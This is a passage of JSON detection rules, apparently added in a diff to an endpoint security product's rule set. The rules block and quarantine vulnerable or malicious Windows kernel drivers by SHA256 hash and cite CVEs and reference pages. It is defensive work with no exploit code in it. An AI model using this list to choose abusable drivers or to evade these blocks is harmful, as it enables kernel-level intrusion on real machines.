+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d7d5c338e4ab0b92bc80961d98a25ceb92a105f58fafda64777d70f6aa138faf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f90a2ffd-0464-52b4-8ae3-eac317372341",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976155Z",
+ "creation_date": "2026-03-23T11:45:29.976157Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976163Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "34e6a56c60746c51034b45a7b2a36617205b598d0bbcc695f92404605a0975d5",
+ "comment": "Vulnerable Lenovo Diagnostics driver (aka LenovoDiagnosticsDriver.sys) [CVE-2022-3699] [https://github.com/alfarom256/CVE-2022-3699] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f916f197-de6b-5c3c-8571-905df60e549b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.476933Z",
+ "creation_date": "2026-03-23T11:45:31.476937Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.476954Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d9733e7799bff5df15ebaa7591d406be7786924a51c819167922e0afa3fda614",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f91c6734-d1ca-59d6-b7ab-a73cb455a6ce",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490713Z",
+ "creation_date": "2026-03-23T11:45:31.490715Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490721Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "318ddeb258168ecbaa379f3199089c7cb23f4c9cd498c0a383beaca109878dd9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f91e4cda-4859-5704-9f13-f638b6771aa4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827140Z",
+ "creation_date": "2026-03-23T11:45:31.827142Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827147Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "47bfe2a7b5686f38002e3a5d5663bb74c4b0a7c280519a9b971ffd003071c07b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f92e3c8a-0275-594f-a06e-a17eeca88374",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153806Z",
+ "creation_date": "2026-03-23T11:45:31.153808Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153814Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8481430a617ece277a9a7bf70c0c50b901c46ecb98a92e335c790c937d9bd70b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f92fa147-7d3e-5374-9d17-14819c11a38b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618006Z",
+ "creation_date": "2026-03-23T11:45:29.618008Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618013Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4115b7a30061d11a034188c0ec7a2223f3b032c8b3420cfffabf6c4df692920d",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f9327c82-ba45-5cbb-afdf-706c0149f6fa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.475618Z",
+ "creation_date": "2026-03-23T11:45:30.475621Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.475630Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bfbc382decb986b6050268e53092eae5e981cb886ccfb116ca7a0b311cef3862",
+ "comment": "Vulnerable Kernel Driver (aka vboxguest.sys) [https://www.loldrivers.io/drivers/0baa833c-e4e1-449e-86ee-cafeb11f5fd5/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f9368f53-f4c3-559a-a3bc-7f03d37c9d9a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.475330Z",
+ "creation_date": "2026-03-23T11:45:30.475333Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.475342Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f0474e76cfd36e37e32cfe5c0a9e05ddee17dd5014d7aa8817ea3634a3540a3f",
+ "comment": "Malicious Kernel Driver (aka ef0e1725aaf0c6c972593f860531a2ea.sys) [https://www.loldrivers.io/drivers/8c2df58f-1e02-4911-ad40-3fa4ed1f4333/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f943649c-5bbb-58b4-947f-d6d4490cf361",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493852Z",
+ "creation_date": "2026-03-23T11:45:31.493855Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493865Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f700eabf6cf46b012b3a0bba05fd7939d6081f686d686591c0021a064c8905a9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f947f404-365b-515a-96d2-a5069eb02091",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825681Z",
+ "creation_date": "2026-03-23T11:45:31.825683Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825688Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "947c7bff48b740945bcee0c26f90952602c023f0226719aed5eb27011016d642",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f9538f55-df4e-501f-9f38-a1a09a117da9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142988Z",
+ "creation_date": "2026-03-23T11:45:31.142990Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142996Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1bebafbe0c2d80ae7087bddb31e91460a94bad99b4bd4176867aee6e16cdd6bb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f9578a90-f1d3-5aa5-a194-4aac65a5ae0e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.456811Z",
+ "creation_date": "2026-03-23T11:45:30.456814Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.456823Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2b33df9aff7cb99a782b252e8eb65ca49874a112986a1c49cd9971210597a8ae",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f960fffb-8411-5135-afda-a28fcb4a353f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979463Z",
+ "creation_date": "2026-03-23T11:45:29.979465Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979471Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f9f2091fccb289bcf6a945f6b38676ec71dedb32f3674262928ccaf840ca131a",
+ "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f9666d23-e67b-5e2b-a5cf-b45775f81d87",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609611Z",
+ "creation_date": "2026-03-23T11:45:29.609613Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609618Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e6056443537d4d2314dabca1b9168f1eaaf17a14eb41f6f5741b6b82b3119790",
+ "comment": "Novell vulnerable driver (aka nicm.sys, nscm.sys and ncpl.sys) [CVE-2013-3956] [https://www.loldrivers.io/drivers/f4126206-564f-49f5-a942-2138a3131e0e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f96b4b19-958d-5727-b819-3e8f72508355",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.459272Z",
+ "creation_date": "2026-03-23T11:45:30.459275Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.459284Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "639ff79f13e40d47b90ecd709699edd10e740cb41451acb95590a68b6352de2b",
+ "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f96cdba9-6561-54a9-9025-14a729c93a1d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822019Z",
+ "creation_date": "2026-03-23T11:45:30.822021Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822026Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a4c9fdd68c1f70df223d50d849fb83d11b1abc2256b8916e195f32360bb647ad",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f980dc73-8f9c-521c-a0ce-ac7962516c38",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822389Z",
+ "creation_date": "2026-03-23T11:45:30.822391Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822396Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aea066ef46a44a082e437c0fd68671ad77ee626f5864a0c2060e8fb970493635",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f997f526-472b-55f4-9e3a-405fdd9edeb4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822476Z",
+ "creation_date": "2026-03-23T11:45:30.822478Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822485Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f025ad896e6048a329aecb506503a79bc4d2717350f2c0bb7aec8fa52d31ba93",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f9b4c0f4-bc34-5fa7-9d7a-9f1fd6480861",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146709Z",
+ "creation_date": "2026-03-23T11:45:31.146711Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146716Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "79f4933225a3b565ec0f74a64d91319d575dd9eed6ff4868794bfa1d5e82cf51",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f9c5a377-f8ca-5879-8e9c-9dd98638ae29",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834409Z",
+ "creation_date": "2026-03-23T11:45:30.834412Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834421Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "325ad9da55291b6a1ea583850bcacdb33c07176b554262cb67ba5124f1a304c3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f9e4e385-4191-5d76-b4f1-b3555fff7c1a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145224Z",
+ "creation_date": "2026-03-23T11:45:32.145226Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145232Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a1fa7d8275ccd14a6adc438ef4b950e7de4ed26fcbe4b3e184243663b03c83d6",
+ "comment": "Vulnerable Kernel Driver (aka RtsPer.sys) [https://www.loldrivers.io/drivers/32155681-33e8-4d0d-b9f6-c822851e7321/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f9f0fc4f-3b9c-5ab8-956f-2efa2e1fbeff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824079Z",
+ "creation_date": "2026-03-23T11:45:30.824081Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824086Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a3b526d6db56c3feadf29d4b0fbd4cfa21f9775e666c50f5a0a8aea81a41854f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
